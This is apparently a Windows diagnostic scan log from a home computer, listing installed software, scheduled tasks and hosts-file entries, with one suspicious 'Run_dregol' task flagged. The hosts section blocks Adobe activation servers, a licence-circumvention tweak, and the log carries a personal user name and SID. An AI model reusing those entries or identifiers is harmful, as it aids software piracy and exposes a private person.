Alcor Micro Smart Card Reader Driver (HKLM-x32\...\SZCCID) (Version: 1.7.2.0 - )
Alcor Micro Smart Card Reader Driver (x32 Version: 1.7.2.0 - ) Hidden
Alcor Micro USB Card Reader (HKLM-x32\...\AmUStor) (Version: 3.1.142.60386 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 3.1.142.60386 - Alcor Micro Corp.) Hidden
Amazon Cloud Player (HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Amazon Amazon Cloud Player) (Version: 2.2.0.399 - Amazon Services LLC)
ARK: Survival Evolved (HKLM-x32\...\Steam App 346110) (Version: - Studio Wildcard)
ASUS AI Recovery (HKLM-x32\...\{D39F0676-163E-4595-A917-E28F99BBD4D2}) (Version: 1.0.24 - ASUS)
ASUS Fan Filter Checker (HKLM-x32\...\{2B0E8920-47D0-4F4D-BE03-76397409B837}) (Version: 1.0.0001 - ASUS)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.29 - ASUS)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.1.7 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 1.1.50 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0040 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 2.0.9 - ASUS)
ASUS Virtual Camera (HKLM-x32\...\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}) (Version: 1.0.25 - ASUS)
AsusScr_G75 Series_ENG (HKLM-x32\...\AsusScr_G75 Series_ENG) (Version: 1.0.0001 - ASUS)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.9.157 - ASUSTEK)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.115 - Atheros)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.0.8.8 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0016 - ASUS)
Audacity 2.0.3 (HKLM-x32\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Audiosurf (HKLM-x32\...\Steam App 12900) (Version: - Dylan Fitterer)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
BitRaider Streaming Client (HKLM-x32\...\BitRaider Streaming Client) (Version: 1.3.3.4098 - BitRaider, LLC)
C4USelfUpdater (x32 Version: 1.00.0000 - Your Company Name) Hidden
CC3 (HKLM-x32\...\CC3) (Version: 3.42 - ProFantasy Software)
CC3 (x32 Version: 3.42 - ProFantasy Software) Hidden
CC3 Update 10 (HKLM-x32\...\CC3 Update 10) (Version: 3.42 - ProFantasy Software)
CC3 Update 10 (x32 Version: 3.42 - ProFantasy Software) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.05 - Piriform)
center (x32 Version: 7.7.2.0 - Eastman Kodak Company) Hidden
Chaos Reborn (HKLM-x32\...\Steam App 319050) (Version: - Snapshot Games Inc.)
Chivalry: Medieval Warfare (HKLM-x32\...\Steam App 219640) (Version: - Torn Banner Studios)
City Designer 3 (HKLM-x32\...\City Designer 3) (Version: 3.24 - ProFantasy Software)
City Designer 3 (x32 Version: 3.24 - ProFantasy Software) Hidden
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Creative Movie Maker 1.0.6.0 (HKLM-x32\...\Creative Movie Maker) (Version: 1.0.6.0 - SAMSUNG)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3624 - CyberLink Corp.)
CyberLink Media Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 8.0.2926 - CyberLink Corp.)
CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 7.0.0.1126 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Depth (HKLM-x32\...\Steam App 274940) (Version: - Digital Confectioners)
Destination Sol (HKLM-x32\...\Steam App 342980) (Version: - Milosh Petrov)
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
Divinity: Dragon Commander (HKLM-x32\...\Steam App 243950) (Version: - Larian Studios)
Don't Starve Together Beta (HKLM-x32\...\Steam App 322330) (Version: - Klei Entertainment)
Dungeon Designer 3 (HKLM-x32\...\Dungeon Designer 3) (Version: 3.0 - ProFantasy Software)
Dungeon Designer 3 (x32 Version: 3.0 - ProFantasy Software) Hidden
Elgato Game Capture HD (HKLM-x32\...\{35C41D04-925A-46C5-B82D-16700425CCC0}) (Version: 1.22.18.318 - Elgato Systems GmbH)
Epson Event Manager (HKLM-x32\...\{03B8AA32-F23C-4178-B8E6-09ECD07EAA47}) (Version: 2.40.0001 - SEIKO EPSON CORPORATION)
EPSON NX420 Series Printer Uninstall (HKLM\...\EPSON NX420 Series) (Version: - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.4j - SEIKO EPSON CORPORATION)
EpsonNet Setup 3.3 (HKLM-x32\...\{C9D8A041-2963-4B31-8FFC-1500F3DB9293}) (Version: 3.3b - SEIKO EPSON CORPORATION)
essentials (x32 Version: 7.7.2.0 - Eastman Kodak Company) Hidden
Evolve [Closed Beta] (HKLM-x32\...\Steam App 203190) (Version: - Turtle Rock Studios)
FF-GP1 (HKLM-x32\...\CM2793) (Version: - )
FINAL FANTASY XIV - A Realm Reborn (Beta Version) (HKLM-x32\...\{9C1BB613-F398-49B7-B346-5DEBA8ABBF38}) (Version: 0.9.1000 - SQUARE ENIX CO., LTD.)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Fractured Space (HKLM-x32\...\Steam App 310380) (Version: - Edge Case Games Ltd.)
GameFast (HKLM\...\GameFast_is1) (Version: 1.0.1.1 - ASUSTEK Computer Inc)
GameStop App (HKLM-x32\...\GameStop App) (Version: 4.00 - GameStop)
GameStop App (x32 Version: 4.00 - GameStop) Hidden
GeForce Experience NvStream Client Components (Version: 1.6.28 - NVIDIA Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.134 - Google Inc.)
Google Update Helper (x32 Version: 1.3.21.79 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.27.5 - Google Inc.) Hidden
Hatoful Boyfriend (HKLM-x32\...\Steam App 310080) (Version: - Mediatonic)
HAWKEN (HKLM-x32\...\Steam App 271290) (Version: - Reloaded Games)
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
InstantOn for NB (HKLM-x32\...\{749F674B-2674-47E8-879C-5626A06B2A91}) (Version: 2.2.0 - ASUS)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.35342 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.3.1427 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{09536BA1-E498-4CC3-B834-D884A67D7E34}) (Version: 1.23.605.1 - Intel Corporation)
Ironcast (HKLM-x32\...\Steam App 327670) (Version: - Dreadbit)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kane & Lynch 2: Dog Days (HKLM-x32\...\Steam App 28000) (Version: - IO Interactive)
Kane & Lynch: Dead Men (HKLM-x32\...\Steam App 8080) (Version: - IO Interactive)
Kodak AIO Printer (Version: 7.7.2.0 - Eastman Kodak Company) Hidden
KODAK AiO Software (HKLM-x32\...\{E0F274B7-592B-4669-8FB8-8D9825A09858}) (Version: 7.7.6.0 - Eastman Kodak Company)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Lichdom: Battlemage (HKLM-x32\...\Steam App 261760) (Version: - Xaviant)
LyricsSing (HKLM-x32\...\lrcsing@DNMard.net) (Version: - DNMard LTD)
Manga Studio EX 4.0 (HKLM-x32\...\Manga Studio EX 4.0) (Version: - )
ManyCam 3.1.59 (HKLM-x32\...\ManyCam) (Version: 3.1.59 - ManyCam LLC)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
McAfee Total Protection (HKLM-x32\...\MSC) (Version: 14.0.1076 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.354 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{6965A8D2-465D-4F98-9FAA-0E9E2348F329}) (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office Home and Student 2013 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 15.0.4727.1003 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\SkyDriveSetup.exe) (Version: 17.0.2015.0811 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mount & Blade: Warband (HKLM-x32\...\Steam App 48700) (Version: - TaleWorlds Entertainment)
Mozilla Firefox 38.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 38.0.5 (x86 en-US)) (Version: 38.0.5 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NVIDIA 3D Vision Driver 331.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.82 - NVIDIA Corporation)
NVIDIA GeForce Experience 1.7.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 1.7.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 331.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.82 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.26.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.26.4 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation)
ocr (x32 Version: 6.2.3.50 - Eastman Kodak Company) Hidden
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4727.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4727.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4727.1003 - Microsoft Corporation) Hidden
OldSchool RuneScape Launcher 1.2.5 (HKLM-x32\...\{375893B6-C8DB-42B0-9547-6E4437542C33}) (Version: 1.2.5 - Jagex Ltd)
ooVoo (HKLM-x32\...\{FAA7F8FF-3C05-4A61-8F14-D8A6E9ED6623}) (Version: 3.6.7001 - ooVoo LLC.)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Platform (x32 Version: 1.39 - VIA Technologies, Inc.) Hidden
Popcorn Time (HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Popcorn Time) (Version: - Popcorn Official)
Portal (HKLM-x32\...\Steam App 400) (Version: - Valve)
Portal 2 (HKLM-x32\...\Steam App 620) (Version: - Valve)
Poser 9 (HKLM-x32\...\Poser 9_is1) (Version: 9.0.0 - Smith Micro Software, Inc.)
PoserContent2012 (HKLM\...\Poser Pro_is1) (Version: 9.0.0 - Smith Micro Software, Inc.)
PreReq (x32 Version: 6.2.4.0 - Eastman Kodak Company) Hidden
Primal Carnage: Extinction (HKLM-x32\...\Steam App 321360) (Version: - Circle Five Studios)
PrintProjects (HKLM-x32\...\PrintProjects) (Version: 1.0.0.9282 - RocketLife Inc.)
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
Robocraft (HKLM-x32\...\Steam App 301520) (Version: - Freejam)
Rotation Desktop for G Series (HKLM\...\Rotation Desktop for G Series_is1) (Version: 1.1.3.2 - ASUSTEK Computer Inc)
Roxio CinePlayer (HKLM-x32\...\{C03F3D5B-0D83-4F81-A324-32F4E7F1BF6A}) (Version: 5.8.58233.4 - Roxio)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SHIELD Streaming (Version: 1.6.53 - NVIDIA Corporation) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.5 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.5.102 - Skype Technologies S.A.)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 2.6.2742.1 - Hi-Rez Studios)
Space Quest Collection (HKLM-x32\...\Steam App 10110) (Version: - Activision)
Star Wars - Battlefront II (HKLM-x32\...\Steam App 6060) (Version: - Pandemic Studios)
Star Wars The Old Republic (HKLM-x32\...\swtor_swtor) (Version: 8.0.0.15 - Bioware/EA)
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: 1.5.2.22875 - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Sunless Sea (HKLM-x32\...\Steam App 304650) (Version: - Failbetter Games)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.43.0 - Synaptics Incorporated)
Talisman: Digital Edition (HKLM-x32\...\Steam App 247000) (Version: - Nomad Games Limited)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
The Banner Saga (HKLM-x32\...\Steam App 237990) (Version: - Stoic)
TurboTax 2010 (HKLM-x32\...\TurboTax 2010) (Version: - Intuit, Inc)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version: - Intuit, Inc)
TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
Unity Web Player (HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\UnityWebPlayer) (Version: 4.6.5f1 - Unity Technologies ApS)
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.39 - VIA Technologies, Inc.)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.4-3 - Wacom Technology Corp.)
War Thunder (HKLM-x32\...\Steam App 236390) (Version: - Gaijin Entertainment)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.2 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.2 - Wacom Technology Corp.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.41.0 - ASUS)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{19EA33FB-B34E-40EA-8B8A-61743AEB795A}) (Version: 3.0.27 - ASUS)
XSplit (HKLM-x32\...\{DAA18A0D-A57C-4611-B135-46EA06990E7D}) (Version: 1.2.1303.0101 - SplitMediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3654736093-338424075-1572945638-1002_Classes\CLSID\{092dfa86-5807-5a94-bf3b-5a53ba9e5308}\InprocServer32 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
CustomCLSID: HKU\S-1-5-21-3654736093-338424075-1572945638-1002_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3654736093-338424075-1572945638-1002_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3654736093-338424075-1572945638-1002_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3654736093-338424075-1572945638-1002_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3654736093-338424075-1572945638-1002_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\FileSyncApi64.dll (Microsoft Corporation)

==================== Restore Points =========================

15-07-2015 03:00:35 Windows Update
15-07-2015 15:00:14 Removed Java 8 Update 51
15-07-2015 15:01:05 Removed Java 8 Update 51
16-07-2015 12:08:05 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 16:34 - 2012-10-31 12:14 - 00001290 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 adobeereg.com


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0FC8C3C0-574D-457E-8BC9-0AC0A432D3CE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-05-19] (Microsoft Corporation)
Task: {11898C26-00F1-4C56-9FFC-E8C2B4B0526F} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2012-02-29] (ASUSTek Computer Inc.)
Task: {26EB921C-2C40-4B7A-964D-3F3E64D287FC} - System32\Tasks\ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2012-02-16] (ASUSTek Computer Inc.)
Task: {2C0C368C-BBD6-4C38-AFA4-42074652D301} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-24] (Google Inc.)
Task: {438C979B-7748-4B1B-8B2B-38ABB0811532} - System32\Tasks\{D7668006-AAE9-4CA4-AD67-72FD0DC87F2F} => pcalua.exe -a "C:\Users\J. Powers\Downloads\epson13800.exe" -d "C:\Users\J. Powers\Downloads"
Task: {567C657F-3F99-41BE-A5AD-33847712FEFC} - System32\Tasks\Amazon Music Helper => C:\Users\J. Powers\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe [2013-12-12] ()
Task: {5A86CA62-93C5-4B6A-818B-0558B25D455E} - System32\Tasks\ASUS P4G => C:\Program Files\ASUS\P4G\BatteryLife.exe [2011-11-15] (ASUS)
Task: {5D034DC3-7F99-4C19-BD7D-4EC7B582F774} - System32\Tasks\GoogleUpdateTaskMachineUA1d050c18a1d0b1d => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-24] (Google Inc.)
Task: {6B5BFE63-B0A7-44C0-99EA-B11445C70468} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2011-11-25] (Intel Corporation)
Task: {77DB151C-B368-4934-BD2F-9517127E94EA} - System32\Tasks\AdobeAAMUpdater-1.0-Demon-PC-J. Powers => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {8539F749-6990-4860-9D31-ED7548764F3E} - System32\Tasks\Microsoft\Windows\TabletPC\InputPersonalization => C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe [2009-07-13] (Microsoft Corporation)
Task: {86AF1D4A-88A5-45BB-85B5-05F5B0477494} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-05-19] (Microsoft Corporation)
Task: {994FE9CF-17C7-49E7-8D68-0A60FD27FC38} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-24] (Google Inc.)
Task: {A0C52CBC-4E11-4067-8F5B-45CFD0055B54} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-08-21] (Piriform Ltd)
Task: {AF4FDF65-DEA8-4A55-A2C0-D976A5F9EC7B} - System32\Tasks\ASUS Live Update => C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe [2012-06-20] (ASUSTeK Computer Inc.)
Task: {BC8CB6F7-B418-4BC9-B45E-22A16D7BC05A} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2015-05-06] (McAfee, Inc.)
Task: {C3B679CE-2CE2-4E65-976E-2B8458C835B1} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-14] (Adobe Systems Incorporated)
Task: {DB413834-6C24-4AAB-B894-B8753118FA13} - System32\Tasks\Run_dregol => C:\Users\J. Powers\AppData\Roaming\Run_dregol\UpdateProc\UpdateTask.exe [2015-06-17] () <==== ATTENTION
Task: {F35680D9-C134-4212-8E92-B21B1B3F3CE7} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2011-11-25] (Intel Corporation)
Task: {FD01AAA0-9A8B-4A02-80FA-578A7682CC54} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)

